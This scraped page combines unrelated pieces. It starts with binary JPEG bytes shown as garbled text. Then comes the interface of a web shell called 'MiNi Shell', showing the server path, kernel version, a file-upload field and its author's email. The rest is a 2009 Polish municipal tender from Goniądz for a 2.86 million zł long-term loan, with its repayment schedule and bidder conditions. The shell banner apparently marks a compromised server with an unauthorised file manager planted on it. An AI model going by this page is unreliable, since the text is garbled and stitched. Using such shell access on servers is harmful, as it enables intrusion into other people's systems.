JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090512/74279-N-2009.html

<p class="kh_header"><b>Goniądz: Udzielenie Gminie Goniądz kredytu długoterminowego na pokrycie planowanego deficytu budżetu Gminy Goniądz w wysokości  2 862 735 zł  (słownie złotych: dwa miliony osiemset sześćdziesiąt dwa tysiące siedemset trzydzieści pięć ).</b><br>
<b>Numer ogłoszenia: 74279 - 2009; data zamieszczenia: 12.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Goniądzu , Plac 11 Listopada 38, 19-110 Goniądz, woj. podlaskie, tel. 085 7380043, faks 085 7380307.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie Gminie Goniądz kredytu długoterminowego na pokrycie planowanego deficytu budżetu Gminy Goniądz w wysokości  2 862 735 zł  (słownie złotych: dwa miliony osiemset sześćdziesiąt dwa tysiące siedemset trzydzieści pięć )..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na:
    Udzielenie Gminie Goniądz kredytu długoterminowego na pokrycie planowanego deficytu budżetu Gminy Goniądz w wysokości  2 862 735 zł  (słownie złotych: dwa miliony osiemset sześćdziesiąt dwa tysiące siedemset trzydzieści pięć ).

    Istotne warunki dotyczące przedmiotu zamówienia:

1/  spłata kredytu następować będzie do ostatniego dnia miesiąca począwszy od dnia 1      stycznia 2010 roku do dnia 31 grudnia 2019 roku, przy czym:
  1. w 2010 roku dwanaście rat, w wysokości 23 856- zł (dwadzieścia trzy tysiące osiemset pięćdziesiąt sześć )  każda rata
  2. w 2011 roku dwanaście rat, w wysokości 23 856- zł (dwadzieścia trzy tysiące osiemset pięćdziesiąt sześć )  każda rata
  3. w 2012 roku dwanaście rat, w wysokości 23 856 zł (dwadzieścia trzy tysiące osiemset pięćdziesiąt sześć )  każda rata
   4. w 2013 roku dwanaście rat, w wysokości 23 856- zł (dwadzieścia trzy tysiące osiemset pięćdziesiąt sześć )  każda rata
  5. w 2014 roku dwanaście rat, w wysokości 23 856- zł (  dwadzieścia trzy tysiące osiemset pięćdziesiąt sześć )  każda rata
  6. w 2015 roku dwanaście rat, w wysokości  23 856 - zł (dwadzieścia trzy tysiące osiemset pięćdziesiąt sześć )  każda rata
  7. w 2016 roku dwanaście rat, w wysokości 23 856- zł (  dwadzieścia trzy tysiące osiemset pięćdziesiąt sześć )  każda rata
  8. w 2017 roku dwanaście rat, w wysokości 23 856- zł (dwadzieścia trzy tysiące osiemset pięćdziesiąt sześć )  każda rata
  9. w 2018 roku dwanaście rat, w wysokości 23 856 zł (  dwadzieścia trzy tysiące osiemset pięćdziesiąt sześć )  każda rata
10. w 2019 roku jedenaście rat, w wysokości 23 856- zł ( dwadzieścia trzy tysiące osiemset pięćdziesiąt sześć ) i jedna rata w wysokości 23 871 - zł ( dwadzieścia trzy tysiące osiemset siedemdziesiąt jeden ).
  

Dopuszcza się możliwość wcześniejszej spłaty kredytu lub jego części bez dodatkowych opłat i prowizji z tego tytułu z zachowaniem 7 dniowego terminu powiadomienia Kredytodawcy o wcześniejszej spłacie kredytu lub jego części.

2/  Wykonawca postawi kredyt do dyspozycji Zamawiającego na wydzielonym rachunku   
     kredytowym w ciągu 3 dni od dnia zawarcia umowy;  naliczanie odsetek nastąpi od  daty 
     uruchomienia kredytu, 
3/  uruchomienie środków następować będzie na podstawie polecenia przelewu, w 
     określonych kwotach i terminach,
 4/  odsetki naliczane będą miesięcznie , od faktycznie wykorzystanych środków; 
      do obliczenia kwoty odsetek przyjmować się będzie rzeczywistą liczbę dni wykorzystania 
      kredytu w stosunku do 365 dni w roku,
 5/  spłata odsetek będzie następowała w ostatnim dniu miesiąca  kalendarzowego okresu 
       obrachunkowego
 6/   spłata kapitału będzie następowała w ostatnim dniu miesiąca  kalendarzowego okresu    
       obrachunkowego,
       
 7/  koszty obsługi kredytu stanowią:
a)	oprocentowanie kredytu - zmienne. Oprocentowanie w całym okresie   
kredytowania stanowi sumę stawki WIBOR 3M z ostatniego dnia roboczego kwartału kalendarzowego, poprzedzającego okres obrachunkowy i stałej w trakcie trwania umowy marży banku. Koszty związane z prowadzeniem rachunku kredytowego oraz wszelkie operacje związane z obsługą kredytu wykonawca jest zobowiązany wliczyć do marży w taki sposób, aby skalkulować i przedstawić jedną stawkę procentową, której wysokość jest wiążąca w całym okresie kredytowania, 
b)	prowizja - liczona jako % od całej kwoty kredytu tj.................... zł. 
      Prowizja musi zawierać w sobie wszelkie opłaty, które związane są 
      z uruchomieniem kredytu,
     8/	Zamawiający zastrzega sobie prawo nie skorzystania z kredytu w pełnej wysokości  
            bez ponoszenia z tego tytułu jakichkolwiek opłat,
    9/  Wykonawca wraz z ofertą załączy proponowany wzór umowy,
    10/  zabezpieczenie kredytu : weksel in blanco i  deklaracja wekslowa. 
    11/  karencja w spłacie kapitału do 31 grudnia 2009 roku
    12/  okres kredytowania od dnia uruchomienia kredytu do dnia 31.12.2019 roku
    13/  kod CPV: 66.13.00.00 - 3  - usługi udzielania kredytu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.13.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:
1/  spełniają warunki określone art. 22 ust.1  ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych ( Dz.U. z 2007 r. Nr 223 poz. 1655 z późn. zm. ) i nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 tej ustawy.
2/ uprawnieni są do występowania w obrocie prawnym, zgodnie z wymogami ustawowymi i  prowadzą działalność tożsamą z niniejszym zamówieniem,
3/ posiadają niezbędną wiedzę i doświadczenie , a także dysponują potencjałem  technicznym oraz pracownikami zdolnymi do wykonania zamówienia
4/ znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
O udzielenie zamówienia mogą ubiegać się Wykonawcy występujący wspólnie. Ze względu na specyfikę przedmiotu zamówienia Zamawiający nie dopuszcza wykonania zamówienia podwykonawcom..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia wymaganych warunków, Wykonawca winien załączyć do oferty następujące dokumenty:
1/  oświadczenie o spełnieniu warunków określonych art. 22 ust. 1 i art. 24 ust. 1 i 2  ustawy Prawo zamówień  publicznych, złożone wg wzoru - załącznik Nr 2 do SIWZ, 
2/  formularz ofertowy wg wzoru -    załącznik Nr 1 do SIWZ,
3/ projekt umowy kredytowej ( sporządzony przez Wykonawcę - Bank ) zawierającej istotne dla Zamawiającego warunki umowy określone niniejszą specyfikacją.
4/ aktualnego odpisu z właściwego rejestru, potwierdzające, że przedmiot działalności Wykonawcy odpowiada przedmiotowi zamówienia - wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5/ zezwolenie uprawniające do dokonywania czynności bankowych obciążających ryzykiem środki powierzone pod jakimkolwiek tytułem
6/  oświadczenie Wykonawcy (na formularzu ofertowym) zawierające :
    -  zgodę na zabezpieczenie kredytu wekslem  in blanco wraz z deklaracją wekslową, 
    -  zgodę na możliwość niewykorzystania części kredytu przez Zamawiającego bez
       ponoszenia dodatkowych kosztów,
   -  zobowiązanie do uruchomienia kredytu w terminie 3 dni od dnia zawarcia umowy 
      w dowolnych kwotach i terminach.
   -  zgodę na okres spłaty kredytu od 01.01.2010 r. do 31.12.2019 r. - zgodnie z harmonogramem  spłaty kredytu na cały okres kredytowania.
7/  oświadczenie Wykonawcy, że zapoznał się ze specyfikacją istotnych warunków zamówienia i nie wnosi zastrzeżeń oraz otrzymał wszelkie konieczne do przygotowania oferty 
     informacje .
8/ oświadczenie Wykonawcy o zobowiązaniu - w przypadku wyboru jego oferty - do zawarcia umowy na warunkach opisanych w SIWZ, w miejscu i terminie wyznaczonym przez 
      Zamawiającego. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu według formuły /spełnia/ -  /nie spełnia/..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.um.goniadz.wrotapodlasia.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Goniądzu
Plac 11 Listopada 38
19-110 Goniądz pok. nr 10.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2009 godzina 10:00, miejsce: Urząd Miejski w Goniądzu
Plac 11 Listopada 38
19-110 Goniądz pok. nr 5 (Sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com